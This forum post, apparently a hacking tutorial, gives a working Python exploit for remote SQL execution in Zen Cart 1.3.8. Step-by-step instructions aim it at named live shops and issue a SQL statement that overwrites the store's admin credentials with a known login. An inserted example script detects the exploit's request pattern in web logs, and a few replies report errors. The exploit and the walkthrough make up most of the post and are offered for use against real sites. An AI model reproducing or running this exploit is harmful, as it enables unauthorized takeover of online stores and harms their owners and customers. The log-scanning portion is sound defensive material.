Then copy and paste this script:
```python
#!/usr/bin/python
#
# ------- Zen Cart 1.3.8 Remote SQL Execution
# http://www.zen-cart.com/
# Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone!
# A new version (1.3.8a) is available on http://www.zen-cart.com/
#
# BlackH :)
#
#
# Notes: must have admin/sqlpatch.php enabled
#
# clean the database :
# DELETE FROM `record_company_info` WHERE `record_company_id` = (SELECT `record_company_id` FROM `record_company` WHERE `record_company_image` = '8d317.php' LIMIT 1);
# DELETE FROM `record_company` WHERE `record_company_image` = '8d317.php';

import urllib, urllib2, re, sys

a, b = sys.argv, 0

def option(name, need = 0):
    # Return the argument that follows "-name" on the command line
    global a, b
    for param in sys.argv:
        if(param == '-'+name):
            return str(sys.argv[b+1])
        b = b + 1
    if(need):
        print '\n#error', "-"+name, 'parameter required'
        exit(1)

if (len(sys.argv) < 2):
    print """
  =____________ Zen Cart 1.3.8 Remote SQL Execution Exploit ____________=
  ========================================================================
  |                                                               BlackH |
  ========================================================================
  |                                                                      |
  | $system> python """+sys.argv[0]+""" -url                             |
  |         Param: ex: http://victim.com/site (no slash)                 |
  |                                                                      |
  | Note: blind "injection"                                              |
  ========================================================================
  """
    exit(1)

url, trick = option('url', 1), "/password_forgotten.php"

while True:
    cmd = raw_input('sql@jah$ ')
    if (cmd == "exit"):
        exit(1)
    req = urllib2.Request(url+"/admin/sqlpatch.php"+trick+"?action=execute", urllib.urlencode({'query_string' : cmd}))
    if (re.findall('1 statements processed', urllib2.urlopen(req).read())):
        print '>> success (', cmd, ")"
    else:
        print '>> failed, be sure to end with ; (', cmd, ")"
```
That is Python; save it with the file name zen.py.
Before that, install Python on your computer first. If you don't have it yet, download it from: http://www.python.org/ftp/python/2.5/python-2.5.msi
Once that's done, open cmd.
For example, if you put zen.py on the desktop, first change directory in cmd to the desktop.
Then type: zen.py -url http://webkorban.com
Example: zen.py -url http://customizthat.com/2010/admin/ <-- enter
After that the prompt sql@jah$ will appear.
When you see that prompt, enter the command: UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; and press enter.
If it works, output like this will appear: >> success ( UPDATE admin SET admin_name='adminz', admin_email='admin@shopadmin.com', admin_pass='617ec22fbb8f201c366e9848c0eb6925:87' WHERE admin_id='1'; )
sql@jah$
Here is an example screenshot:
Once it has succeeded, just add /admin/ to the target URL.
If it succeeded, the username and password are always adminz : wew
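From the defender's side, the request pattern this walkthrough relies on (a POST to admin/sqlpatch.php with extra path information after the script name and action=execute in the query string) stands out in web server logs. The Python 3 script below is an added example, not part of the original post or of Zen Cart: it scans constructed Apache-style log lines and returns a finding for each such request, including attempts that were answered with a 404.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache combined-format log lines for this example; the
# addresses, host and timestamps are made up, not taken from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2010:12:00:01 +0000] "GET /index.php?main_page=login HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2010:12:00:09 +0000] "POST /admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1" 200 812 "-" "Python-urllib/2.5"
198.51.100.7 - - [10/Mar/2010:12:01:30 +0000] "POST /admin/sqlpatch.php?action=execute HTTP/1.1" 302 0 "http://shop.example/admin/" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2010:12:02:00 +0000] "POST /admin/sqlpatch.php/password_forgotten.php?action=execute HTTP/1.1" 404 210 "-" "Python-urllib/2.5"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

SQLPATCH = '/admin/sqlpatch.php'

def classify(line):
    """Return a finding dict for a suspicious sqlpatch.php request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    idx = parts.path.find(SQLPATCH)
    if idx < 0:
        return None
    # Anything after sqlpatch.php is PATH_INFO; the script above appends
    # /password_forgotten.php there, which legitimate use of the tool has no reason to do.
    path_info = parts.path[idx + len(SQLPATCH):]
    action = parse_qs(parts.query).get('action', [''])[0]
    reasons = []
    if path_info:
        reasons.append('unexpected PATH_INFO %r on sqlpatch.php' % path_info)
    if m.group('method') == 'POST' and action == 'execute':
        reasons.append('POST action=execute (direct SQL submission)')
    if not reasons:
        return None
    return {'ip': m.group('ip'), 'time': m.group('ts'), 'status': int(m.group('status')),
            'path_info': path_info, 'user_agent': m.group('ua'), 'reasons': reasons}

def scan(log_text):
    """Scan a whole log and return findings in log order (404s included: attempts count)."""
    return [f for f in map(classify, log_text.splitlines()) if f]

if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print('%s %s HTTP %d: %s' % (f['time'], f['ip'], f['status'], '; '.join(f['reasons'])))
```

A request to sqlpatch.php with any PATH_INFO, or any POST with action=execute, deserves a look regardless of status code, since the tool is only needed during installation.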
Bro, looks like this doesn't work anymore??
It just shows failed for me.
I got this error..
Traceback (most recent call last):
File "zen.py", line 53, in
if (re.findall('1 statements processed',urllib2.urlopen(req).read())):
File "C:\Python25\lib\urllib2.py", line 124, in urlopen
return _opener.open(url, data)
File "C:\Python25\lib\urllib2.py", line 387, in open
response = meth(req, response)
File "C:\Python25\lib\urllib2.py", line 498, in http_response
'http', request, response, code, msg, hdrs)
File "C:\Python25\lib\urllib2.py", line 425, in error
return self._call_chain(*args)
File "C:\Python25\lib\urllib2.py", line 360, in _call_chain
result = func(*args)
File "C:\Python25\lib\urllib2.py", line 506, in http_error_default
raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
urllib2.HTTPError: HTTP Error 404: Not Found